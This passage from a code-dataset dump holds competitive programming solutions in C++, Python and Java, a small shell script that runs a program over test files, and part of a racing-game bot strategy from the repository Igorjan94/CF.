v = perm_by_num(number, n);\n    for (int i = 0; i < v.size(); i++) {\n        out << v[i] << \" \";\n    }\n}" }, { "alpha_fraction": 0.38805970549583435, "alphanum_fraction": 0.39745715260505676, "avg_line_length": 18.89011001586914, "blob_id": "8f226d87fd6c037d310a9e82355f6b108b6514d0", "content_id": "c3a0bed1babd1b0ed3b5dc66fab4b1f23e61859f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1809, "license_type": "no_license", "max_line_length": 67, "num_lines": 91, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) 
(a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n \ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nstruct tri\n{\n ll x;\n bool f;\n int i;\n tri(ll x, bool a, int q)\n {\n this->x = x;\n f = a;\n i = q;\n }\n \n bool operator<(tri const& a) const\n {\n if (x != a.x)\n return x < a.x;\n return f > a.f;\n }\n};\n \nint main() {\n // freopen(\"in.in.c\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n ll m;\n cin >> n >> m;\n vector<tri> a;\n ll x;\n int y;\n fori(n)\n cin >> x >> y,\n a.pb(tri(x, y == 1, i + 1));\n sort(a.rbegin(), a.rend());\n // fori(n)\n // cout << a[i].x << \" \" << a[i].f << \" \" << a[i].i << \"\\n\";\n int i = 0;\n ll sum = 0;\n int count = 0;\n while (i < n && sum < m)\n count += a[i].f,\n sum += a[i++].x;\n \n \n int l = i - 1;\n int r = i;\n while (true){\n while (l + 1 && a[l].f)\n l--;\n while (r < n && !a[r].f)\n r++;\n // cout << l << \" \" << r << endl;\n if (l <= -1 || r >= n)\n break;\n if (!a[l].f && a[r].f && sum - a[l].x + a[r].x >= m){\n sum = sum - a[l].x + a[r].x;\n swap (a[l], a[r]);\n count++;\n l--;\n r++;\n }\n else\n break;\n }\n cout << i << \" \" << count << \"\\n\";\n forj(i)\n cout << a[j].i << \" \";\n return 0;\n}" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.4529411792755127, "avg_line_length": 11.142857551574707, "blob_id": "b7fa379fa43b4f2e9844006bd03dfbd91ffcdcc7", "content_id": "867a6f4c7d2ce8d46bd84df5b3e588f0aa86e055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/scripts/runJury.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": 
"exe=$1\ndir=$2\n\nif [ ! \"$dir\" ]; then\n dir=\".\"\nfi\n\n\nfor i in $(seq 1 1000)\ndo\n if [ ! -f \"$dir/$i\" ]; then break; fi\n $exe < $dir/$i > $dir/$i.a\n echo $i\ndone\n" }, { "alpha_fraction": 0.45098039507865906, "alphanum_fraction": 0.529411792755127, "avg_line_length": 50, "blob_id": "e9807a2b1022349c8183dbd911d6590dd1f2e991", "content_id": "282b10006943c5eb093053eb292adbaa99ac4d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 50, "num_lines": 1, "path": "/CodeForce/1703/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "for s in[*open(0)][2::2]:print(len(s)+len({*s})-2)\n" }, { "alpha_fraction": 0.46086955070495605, "alphanum_fraction": 0.4859721064567566, "avg_line_length": 29.323383331298828, "blob_id": "5bd24a42505ea983139bfa46066f2bc0fc4f447c", "content_id": "fad303b35bcce0eeb0f342ce204f3c603e1722cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6095, "license_type": "no_license", "max_line_length": 165, "num_lines": 201, "path": "/CodeForce/0676/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi 
vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nint xt, yt, xm, ym, n, m;\nvector<string> s;\nint d[5][1111][1111];\nvector<vector<char>> mp;\nmap<pii, bool> door[256];\n\nvector<pair<int, int>> get(char c) {\n switch(c)\n {\n case '+': return {{0, 0}, {1, 0}, {-1, 0}, {0, 1}, {0, -1}};\n case '-': return {{0, 0}, {1, 0}, {-1, 0}};\n case '|': return {{0, 0}, {0, 1}, {0, -1}};\n case '^': return {{0, 0}, {0, -1}};\n case '>': return {{0, 0}, {1, 0}};\n case '<': return {{0, 0}, {-1, 0}};\n case 'v': return {{0, 0}, {0, 1}};\n case 'L': return {{0, 0}, {1, 0}, {0, 1}, {0, -1}};\n case 'R': return {{0, 0}, {-1, 0}, {0, 1}, {0, -1}};\n case 'U': return {{0, 0}, {1, 0}, {-1, 0}, {0, 1}};\n case 'D': return {{0, 0}, {1, 0}, {-1, 0}, {0, -1}};\n default : return {};\n }\n}\n\nchar next(char c)\n{\n switch(c)\n {\n case '+': return '+';\n case '-': return '|';\n case '|': return '-';\n case '^': return '>';\n case '>': return 'v';\n case '<': return '^';\n case 'v': return '<';\n case 'L': return 'U';\n case 'R': return 'D';\n case 'U': return 'R';\n case 'D': return 'L';\n default : return '*';\n }\n}\n\nint wave(int i, int j, int mod, int ans)\n{\n queue<pair<pii, pii>> q;\n q.push({{i, j}, {mod, ans}});\n while (q.size())\n {\n tie(i, j) = q.front().first;\n tie(mod, ans) = q.front().second;\n //writeln(i, j, mod);\n q.pop();\n if (i == xm && j == ym)\n return d[mod][j][i];\n for (auto ddd : get(mp[s[j][i]][mod]))\n {\n int u = i + ddd.first;\n int v = j + ddd.second;\n int newmod = (mod 
+ (u == i && v == j)) % 4;\n if (u == -1 || v == -1 || u == m || v == n || s[v][u] == '*')\n continue;\n if ((door[mp[s[v][u]][mod]][{-ddd.first, -ddd.second}] || ddd.first + ddd.second == 0) && d[newmod][v][u] == INF)\n {\n d[newmod][v][u] = d[mod][j][i] + 1;\n q.push({{u, v}, {newmod, ans + 1}});\n }\n\n }\n }\n return -1;\n}\n\nvoid run()\n{\n readln(n, m);\n s.resize(n);\n mp.resize(256);\n readln(s, yt, xt, ym, xm);--xt;--yt;--xm;--ym;\n fori(n)\n forj(m)\n forn(k, 4)\n d[k][i][j] = INF;\n d[0][yt][xt] = 0;\n string t = \"+-|^><vLRDU*\";\n for (char c : t)\n {\n char r = c;\n fori(4)\n mp[r].pb(c),\n c = next(c);\n }\n for (char c : t)\n for (auto ddd : get(c))\n door[c][ddd] = true;\n writeln(wave(xt, yt, 0, 0));\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5395683646202087, "alphanum_fraction": 0.5467625856399536, "avg_line_length": 22, "blob_id": "1c5db259a99d479eea9b0886bdedb79e260ac934", "content_id": "582fc719d963faf36dbb74a62a2c5430e03f365e", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.20/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "task = 'elephants'\nf = open(task + '.in', 'r')\ng = open(task + '.out', 'w')\ng.write(\"SHALYTO\"[int(f.readline()) - 1])\ng.close()\nf.close()\n\n" }, { "alpha_fraction": 0.41429218649864197, "alphanum_fraction": 0.418815016746521, "avg_line_length": 21.110000610351562, "blob_id": "f8d596400fca060a6c427238b2755af5a611ece9", "content_id": "0fbd4b83f6201c1e62c27a5cc002e44258ab638d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 70, "num_lines": 100, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.28/A.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class A {\n \n final static String input = \"input.txt\";\n final static String output = \"output.txt\";\n \n public void run() {\n int n = nextInt(), m = 3;\n \n String[][] rnames = new String[n][m];\n \n for (int i = 0; i < n; i++) {\n for (int j = 0; j < m; j++) {\n rnames[i][j] = next();\n }\n }\n \n int[] p = new int[n];\n \n for (int i = 0; i < n; i++) {\n p[i] = nextInt() - 1;\n }\n \n String[][] names = new String[n][];\n for (int i = 0; i < n; i++) {\n names[i] = rnames[p[i]];\n }\n \n String[] ans = new String[n];\n \n String cur = \"\";\n \n for (int i = 0; cur != null && i < n; i++) {\n Arrays.sort(names[i]);\n \n for (int j = 0; j < m; j++) {\n if (cur.compareTo(names[i][j]) < 0) {\n ans[i] = names[i][j];\n break;\n }\n }\n cur = ans[i];\n }\n \n if (cur == null) {\n out.println(\"IMPOSSIBLE\");\n return;\n }\n \n for (int i = 0; i < n; i++) {\n out.println(ans[i]);\n }\n \n }\n \n int nextInt() {\n return 
Integer.parseInt(next());\n }\n \n String nextLine() {\n try {\n return br.readLine();\n } catch (IOException e) {\n return null;\n }\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n st = new StringTokenizer(nextLine());\n }\n return st.nextToken();\n }\n \n static PrintWriter out;\n static BufferedReader br;\n static StringTokenizer st;\n \n public static void main(String[] arg) throws IOException {\n \n if (input == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(new File(input)));\n }\n \n if (output == null) {\n out = new PrintWriter(System.out);\n } else {\n out = new PrintWriter(new File(output));\n }\n \n new A().run();\n br.close();\n out.close();\n \n }\n}\n" }, { "alpha_fraction": 0.39961013197898865, "alphanum_fraction": 0.42105263471603394, "avg_line_length": 18, "blob_id": "913306f58b171c0b7d33a874d3bece1008f2299a", "content_id": "ae627d83513488abe7d957c6cf9b7197b33b9908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 42, "num_lines": 27, "path": "/2021/gcjQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def readln():\n return list(map(int, input().split()))\n\n\ndef run():\n [n, c] = readln()\n c -= n - 1\n\n a = [str(i + 1) for i in range(n)]\n b = [False for i in range(n)]\n for i in range(n - 1):\n if c >= n - i - 1:\n c -= n - i - 1\n b[i] = True\n\n if c != 0: return 'Impossible'\n\n for i in range(n - 1, -1, -1):\n if b[i]:\n a[i:n] = reversed(a[i:n])\n\n return ' '.join(a)\n\n\n[t] = readln()\nfor q in range(1, t + 1):\n print(f'Case #{q}: {run()}')\n" }, { "alpha_fraction": 0.38175907731056213, "alphanum_fraction": 0.405638188123703, "avg_line_length": 40.06583786010742, "blob_id": "529f0c2575b641534ffa17ae620afcfe69944ba9", "content_id": "d08f4f170488975dc7368f2155e1914fccccec50", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 91836, "license_type": "no_license", "max_line_length": 634, "num_lines": 2172, "path": "/trains/ai/cpp-cgdk/old2.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\r\n\r\n\r\n\r\n\r\n//Не читайте этот код, у Вас вытекут глаза :(\r\n\r\n\r\n\r\n\r\n\r\n//Объезжалочка\r\n//Я умею говнокодить 2\r\n#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n#define go(p, a, b) { if (p) goto a; else goto b; }\r\n\r\n#include <bits/stdc++.h>\r\n//#ifdef ONLINE_JUDGE\r\n//#define debug 1\r\n//#endif\r\n#ifdef debug\r\n//#undef debug\r\n//#endif\r\n#include \"library.h\"\r\n#endif\r\n\r\n#ifdef vis\r\n#include \"Debug.h\"\r\nDebug visual;\r\n#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 90;\r\nint FORCE_BACK = 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 16;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\nint PLANB = 123456;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\ndouble eps = 5;\r\n\r\ndouble power = 1;\r\nbool changed = false;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\nbool init = true;\r\nbool snake = false;\r\nbool drift = false;\r\ndouble width;\r\ndouble height;\r\nint d = 0;\r\nint pd = 0;\r\nset<pair<int, int>> bad;\r\nvector<pair<int, int>> old;\r\nint planB = 0;\r\nvector<vector<bool>> visited;\r\nvector<vector<bool>> once;\r\n\r\nbool changedj = false;\r\ndouble distToNextij = -10000;\r\ndouble prevDistanceij = -10000;\r\nint countOfFailsj = 0;\r\nint forceBackj = 0;\r\nint forceRightj = 0;\r\nint forcej = 0;\r\nint prevxj = 0;\r\nint currxj = -1234;\r\nint forceSlowj 
= 0;\r\nint globalFailj = 0;\r\ndouble turnj = 0.0;\r\nbool initj = true;\r\nbool snakej = false;\r\nbool driftj = false;\r\ndouble widthj;\r\ndouble heightj;\r\nint dj = 0;\r\nint pdj = 0;\r\nset<pair<int, int>> badj;\r\nvector<pair<int, int>> oldj;\r\nint planBj = 0;\r\ndouble powerj = 1;\r\nvector<vector<bool>> visitedj;\r\nvector<vector<bool>> oncej;\r\n\r\n#define RIGHT 0\r\n#define UP 1\r\n#define LEFT 2\r\n#define DOWN 3\r\n\r\nvector<int> ddx = {1, 0, -1, 0};\r\nvector<int> ddy = {0, -1, 0, 1};\r\nmap<pair<int, int>, int> directions;\r\n\r\nvector<vector<vector<int>>> goforward = { /* сначала шли вправо*/ { { RIGHT, UP, DOWN, LEFT }, { RIGHT, UP, LEFT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, /*1 сначала шли вверх*/ { { UP, RIGHT, DOWN, LEFT }, { UP, LEFT, RIGHT, DOWN }, { UP, LEFT, DOWN, RIGHT }, { DOWN, LEFT, RIGHT, UP } }, /*2 сначала шли влево*/ { { RIGHT, UP, DOWN, LEFT }, { LEFT, UP, RIGHT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, /*3 сначала шли вниз*/ { { DOWN, RIGHT, UP, LEFT }, { UP, RIGHT, LEFT, DOWN }, { DOWN, LEFT, UP, RIGHT }, { DOWN, RIGHT, LEFT, UP } } }; //СНАЧАЛА ИДЕМ ПРЯМО ЕСЛИ МОЖЕМ\r\n\r\nvector<vector<vector<int>>> FUUUUU = {\r\n/*0 сначала шли вправо*/\r\n {\r\n //->\r\n {\r\n UP, DOWN, RIGHT, LEFT\r\n },\r\n //^\r\n {\r\n RIGHT, UP, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n UP, DOWN, LEFT, RIGHT\r\n },\r\n //V\r\n {\r\n RIGHT, DOWN, LEFT, UP\r\n }\r\n },\r\n/*1 сначала шли вверх*/ \r\n {\r\n //->\r\n {\r\n UP, RIGHT, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n LEFT, RIGHT, UP, DOWN\r\n },\r\n //<-\r\n {\r\n UP, LEFT, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n LEFT, RIGHT, DOWN, UP\r\n }\r\n },\r\n/*2 сначала шли влево*/ \r\n {\r\n //->\r\n {\r\n UP, DOWN, RIGHT, LEFT\r\n },\r\n //^\r\n {\r\n LEFT, UP, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n UP, DOWN, LEFT, RIGHT\r\n },\r\n //V\r\n {\r\n LEFT, DOWN, RIGHT, UP\r\n }\r\n },\r\n/*3 сначала шли вниз*/ \r\n {\r\n //->\r\n {\r\n DOWN, RIGHT, UP, LEFT\r\n },\r\n 
//^\r\n {\r\n RIGHT, LEFT, UP, DOWN\r\n },\r\n //<-\r\n {\r\n DOWN, LEFT, UP, RIGHT\r\n },\r\n //V\r\n {\r\n RIGHT, LEFT, DOWN, UP\r\n }\r\n }\r\n}, FU;\r\n\r\nint opposite(int x, int y)\r\n{\r\n return abs(x - y) == 2;\r\n}\r\n\r\nstruct vertex\r\n{\r\n int x, y, qd, qpd; \r\n vertex(){} \r\n vertex(int x, int y, int pd, int d) : x(x), y(y), qd(d), qpd(pd) {}\r\n};\r\n\r\ntemplate <typename T>\r\nvoid ppp(vector<vector<T>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n printf(\"\\n\");\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\ndouble getCenter(double xxx)\r\n{\r\n return (xxx + 0.5) * tileSize;\r\n}\r\n\r\ndouble get(double xxx)\r\n{\r\n return xxx * tileSize;\r\n}\r\n\r\ndouble get34(double xxx)\r\n{\r\n return (xxx + 0.9) * tileSize;\r\n}\r\n\r\ndouble get14(double xxx)\r\n{\r\n return (xxx + 0.1) * tileSize;\r\n}\r\n\r\nbool isVertical(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.first == b.first;\r\n}\r\n\r\nbool isHorizontal(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.second == b.second;\r\n}\r\n\r\nbool is32(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]))\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is3_2(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isVertical(a[1], a[4]) &&\r\n isHorizontal(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n 
isHorizontal(a[1], a[4]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is212(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4]) &&\r\n isHorizontal(a[1], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]) &&\r\n isVertical(a[1], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is41(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is4(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 4)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is131(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\r\n else\r\n return make_pair(get(max(a.first, b.first)), getCenter(a.second));\r\n}\r\n\r\ndouble get(double x, double v)\r\n{\r\n return (x + v) * 
tileSize;\r\n}\r\n\r\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b, pair<int, int>& c)\r\n{\r\n // a\r\n //cbc\r\n double xxx = 0.25;\r\n if (isVertical(a, b))\r\n return make_pair(get(max(b.first, c.first)), get(b.second, a.second < b.second ? xxx : 1 - xxx));\r\n else\r\n // c\r\n // ab\r\n // c\r\n return make_pair(get(b.first, a.first < b.first ? xxx : 1 - xxx), get(max(b.second, c.second)));\r\n //if (isVertical(a, b))\r\n //return make_pair(c.first > b.first ? get14(a.first) : get34(a.first), a.second > b.second ? get14(b.second) : get34(b.second));\r\n //else\r\n //return make_pair(a.first < b.first ? get34(b.first) : get14(b.first), c.second > b.second ? get14(b.second) : get34(b.second));\r\n}\r\n\r\nint opposite(int x)\r\n{\r\n switch (x)\r\n {\r\n case LEFT:\r\n case RIGHT:\r\n return 2 - x;\r\n default:\r\n return 4 - x;\r\n }\r\n}\r\n\r\nbool isRightTo(pair<int, int> a, pair<int, int> b) // ba\r\n{\r\n return a.first - 1 == b.first && a.second == b.second;\r\n}\r\n\r\nbool isLeftTo(pair<int, int> a, pair<int, int> b) // ab\r\n{\r\n return a.first + 1 == b.first && a.second == b.second;\r\n}\r\n\r\nbool isUpTo(pair<int, int> a, pair<int, int> b) // ab\r\n{\r\n return a.first == b.first && a.second + 1 == b.second;\r\n}\r\n\r\nbool isDownTo(pair<int, int> a, pair<int, int> b) // ba\r\n{\r\n return a.first == b.first && a.second - 1 == b.second;\r\n}\r\n\r\nint getDirectionByAngle(double angle)\r\n{\r\n double sasdfasdf = PI / 9;\r\n if (fabs(angle) < sasdfasdf)\r\n return RIGHT;\r\n if (fabs(angle - PI / 2) < sasdfasdf)\r\n return DOWN;\r\n if (fabs(angle + PI / 2) < sasdfasdf)\r\n return UP;\r\n if (fabs(angle - PI) < sasdfasdf)\r\n return LEFT;\r\n if (fabs(angle + PI) < sasdfasdf)\r\n return LEFT;\r\n return -1;\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n //cout << (self.getType() == BUGGY ? 
\"BUGGY\\n\" : \"JEEP\\n\");\r\n if (self.getType() == BUGGY)\r\n {\r\n#ifdef vis\r\n visual.beginPre();\r\n#endif\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n if (init)\r\n {\r\n FU = goforward;\r\n //мне стало лень думать\r\n if (world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\")\r\n FUUUUU = goforward;\r\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\r\n //cout << self.getX() << \" \" << self.getY() << \"\\n\";\r\n init = false;\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n visited.resize(a.size());\r\n once.resize(a.size());\r\n for (int i = 0; i < visited.size(); ++i)\r\n visited[i].resize(a[0].size(), false),\r\n once[i].resize(a[0].size(), false);\r\n d = getDirectionByAngle(self.getAngle());\r\n pd = d;\r\n#ifdef debug\r\n cout << self.getAngle() << \" ANGLE \" << pd << \" \" << d << \"\\n\";\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n {\r\n //cout << wx << \" \" << wy << \" \" << qx << \" \" << qy << \" \" << pd << \" \" << d << \"\\n\";\r\n old[0] = {qx, qy};\r\n pd = d;\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n //int tqwer = getDirectionByAngle(self.getAngle());\r\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\r\n FU = FUUUUU;\r\n //if (tqwer != -1)\r\n //d = tqwer;\r\n //if (forceBack)\r\n //d = opposite(d);\r\n }\r\n\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n for (int i = 0; i < min(3, int(wp.size())); 
